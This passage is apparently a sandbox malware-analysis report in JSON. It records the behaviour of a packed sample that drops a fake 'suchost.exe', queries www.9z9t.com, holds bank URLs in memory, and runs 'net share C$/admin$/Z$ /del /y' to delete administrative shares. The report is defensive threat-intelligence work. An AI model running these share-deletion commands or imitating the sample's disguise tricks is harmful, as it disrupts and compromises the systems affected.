"attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"suchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003172)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003172)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003172)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003172)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00003172)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00003172)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003172)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\ose.exe (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\drprov.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\ntlanman.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\setup.exe (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\davclnt.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter cscapi.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter netutils.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter NSI.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter CFGMGR32.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00002084)\n \"suchost.exe\" called \"LoadLibrary\" with a parameter C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\DW20.EXE (UID: 00000000-00002084)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003484)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003484)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003484)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003484)\n \"net.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00000768)\n \"net.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00000768)\n \"net.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000768)\n \"net.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000768)\n \"net.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000768)\n \"net.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000768)\n \"net.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00003456)\n \"net.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00003456)\n \"net.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003456)\n \"net.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003456)\n \"net.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003456)\n \"net.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003456)\n \"net1.exe\" called \"LoadLibrary\" with a parameter NETMSG (UID: 00000000-00001956)\n \"net1.exe\" called \"LoadLibrary\" with a parameter NETMSG (UID: 00000000-00000516)\n \"net1.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00001284)\n \"net1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00001284)\n \"net1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001284)\n \"net1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001284)\n \"net1.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001284)\n \"net1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001284)\n \"net1.exe\" called \"LoadLibrary\" with a parameter cscapi.dll (UID: 00000000-00001284)\n \"net1.exe\" called \"LoadLibrary\" with a parameter NETMSG (UID: 00000000-00001284)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"suchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"suchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"net.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"net.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"net1.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"net1.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"suchost.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00002084)\n \"suchost.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00002084)\n \"suchost.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00002084)\n \"suchost.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00002084)\n \"suchost.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00002084)\n \"suchost.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\History (UID: 00000000-00002084)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"www.9z9t.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3\" has an executable section named \"CODE\"\n \"setup.exe\" has an executable section named \"CODE\"\n \"7zFM.exe\" has an executable section named \"CODE\"\n \"7zG.exe\" has an executable section named \"CODE\"\n \"Uninstall.exe\" has an executable section named \"CODE\"\n \"suchost.exe\" has an executable section named \"CODE\"\n \"DW20.EXE\" has an executable section named \"CODE\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3\" has an writable section named \"DATA\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3\" has an writable section named \"BSS\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3\" has an writable section named \".idata\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3\" has an writable section named \".tls\"\n \"setup.exe\" has an writable section named \"DATA\"\n \"setup.exe\" has an writable section named \"BSS\"\n \"setup.exe\" has an writable section named \".idata\"\n \"setup.exe\" has an writable section named \".tls\"\n \"7zFM.exe\" has an writable section named \"DATA\"\n \"7zFM.exe\" has an writable section named \"BSS\"\n \"7zFM.exe\" has an writable section named \".idata\"\n \"7zFM.exe\" has an writable section named \".tls\"\n \"7zG.exe\" has an writable section named \"DATA\"\n \"7zG.exe\" has an writable section named \"BSS\"\n \"7zG.exe\" has an writable section named \".idata\"\n \"7zG.exe\" has an writable section named \".tls\"\n \"Uninstall.exe\" has an writable section named \"DATA\"\n \"Uninstall.exe\" has an writable section named \"BSS\"\n \"Uninstall.exe\" has an writable section named \".idata\"\n \"Uninstall.exe\" has an writable section named \".tls\"\n \"suchost.exe\" has an writable section named \"DATA\"\n \"suchost.exe\" has an writable section named \"BSS\"\n \"suchost.exe\" has an writable section named \".idata\"\n \"suchost.exe\" has an writable section named \".tls\"\n \"DW20.EXE\" has an writable section named \"DATA\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"suchost.exe\" (UID: 00000000-00003172)\n Spawned process \"suchost.exe\" (UID: 00000000-00002084)\n Spawned process \"cmd.exe\" with commandline \"/c net share Z$ /del /y\" (UID: 00000000-00003484)\n Spawned process \"cmd.exe\" with commandline \"/c net share C$ /del /y\" (UID: 00000000-00003548)\n Spawned process \"cmd.exe\" with commandline \"/c net share admin$ /del /y\" (UID: 00000000-00005192)\n Spawned process \"net.exe\" with commandline \"net share Z$ /del /y\" (UID: 00000000-00000768)\n Spawned process \"net.exe\" with commandline \"net share C$ /del /y\" (UID: 00000000-00003456)\n Spawned process \"net.exe\" with commandline \"net share admin$ /del /y\" (UID: 00000000-00002188)\n Spawned process \"net1.exe\" with commandline \"%WINDIR%\\\\system32\\\\net1 share admin$ /del /y\" (UID: 00000000-00001956)\n Spawned process \"net1.exe\" with commandline \"%WINDIR%\\\\system32\\\\net1 share C$ /del /y\" (UID: 00000000-00000516)\n Spawned process \"net1.exe\" with commandline \"%WINDIR%\\\\system32\\\\net1 share Z$ /del /y\" (UID: 00000000-00001284)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"suchost.exe\" (UID: 00000000-00003172)\n Spawned process \"suchost.exe\" (UID: 00000000-00002084)\n Spawned process \"cmd.exe\" with commandline \"/c net share Z$ /del /y\" (UID: 00000000-00003484)\n Spawned process \"cmd.exe\" with commandline \"/c net share C$ /del /y\" (UID: 00000000-00003548)\n Spawned process \"cmd.exe\" with commandline \"/c net share admin$ /del /y\" (UID: 00000000-00005192)\n Spawned process \"net.exe\" with commandline \"net share Z$ /del /y\" (UID: 00000000-00000768)\n Spawned process \"net.exe\" with commandline \"net share C$ /del /y\" (UID: 00000000-00003456)\n Spawned process \"net.exe\" with commandline \"net share admin$ /del /y\" (UID: 00000000-00002188)\n Spawned process \"net1.exe\" with commandline \"%WINDIR%\\\\system32\\\\net1 share admin$ /del /y\" (UID: 00000000-00001956)\n Spawned process \"net1.exe\" with commandline \"%WINDIR%\\\\system32\\\\net1 share C$ /del /y\" (UID: 00000000-00000516)\n Spawned process \"net1.exe\" with commandline \"%WINDIR%\\\\system32\\\\net1 share Z$ /del /y\" (UID: 00000000-00001284)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"suchost.exe\" (UID: 00000000-00002084) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"suchost.exe\" (UID: 00000000-00002084) was launched with modified environment variables: \"PSModulePath, PATHEXT\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3\" was detected as \"Turbo Linker\" and name: \"Linker\"\n \"setup.exe\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"setup.exe\" was detected as \"Turbo Linker\" and name: \"Linker\"\n \"7zFM.exe\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"7zFM.exe\" was detected as \"Turbo Linker\" and name: \"Linker\"\n \"7zG.exe\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"7zG.exe\" was detected as \"Turbo Linker\" and name: \"Linker\"\n \"Uninstall.exe\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"Uninstall.exe\" was detected as \"Turbo Linker\" and name: \"Linker\"\n \"suchost.exe\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"suchost.exe\" was detected as \"Turbo Linker\" and name: \"Linker\"\n \"DW20.EXE\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"DW20.EXE\" was detected as \"Turbo Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-23", "type": 2, "relevance": 2, "name": "Detected known bank URL artifact", "description": "\"www.credit-agricole.fr\" (Source: 00000000-00002084.00000001.144084.00294000.00000004.mdmp, Indicator: \"credit-agricole.fr\")\n \"capitalone.com\" (Source: 00000000-00002084.00000001.144084.00320000.00000004.mdmp, Indicator: \"capitalone.com\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3\" was detected as \"BobSoft Mini Delphi -> BoB / BobSoft\"\n \"setup.exe\" was detected as \"BobSoft Mini Delphi -> BoB / BobSoft\"\n \"7zFM.exe\" was detected as \"BobSoft Mini Delphi -> BoB / BobSoft\"\n \"7zG.exe\" was detected as \"BobSoft Mini Delphi -> BoB / BobSoft\"\n \"Uninstall.exe\" was detected as \"BobSoft Mini Delphi -> BoB / BobSoft\"\n \"suchost.exe\" was detected as \"BobSoft Mini Delphi -> BoB / BobSoft\"\n \"DW20.EXE\" was detected as \"BobSoft Mini Delphi -> BoB / BobSoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"net1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\mpr.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\netapi32.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\netutils.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\srvcli.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\wkscli.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\SCHEDCLI.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\wsock32.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.ENU.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.EN.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\Windows\\system32\\drivers\\suchost.exe\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\MPR.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\NETAPI32.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\NETUTILS.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to access non-existent file \"C:\\SRVCLI.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" reads file \"c:\\29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" reads file \"c:\\windows\\system32\\drivers\\suchost.exe\"\n \"suchost.exe\" reads file \"c:\\windows\\system32\\drivers\\suchost.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\mpr.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\Windows\\system32\\mpr.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\netapi32.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\Windows\\system32\\netapi32.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\netutils.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\Windows\\system32\\netutils.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\srvcli.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\Windows\\system32\\srvcli.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\wkscli.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\Windows\\system32\\wkscli.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\SCHEDCLI.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\Windows\\system32\\SCHEDCLI.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\version.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\wsock32.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\Windows\\system32\\wsock32.dll\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.ENU\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.ENU.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.EN\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.EN.DLL\"\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n 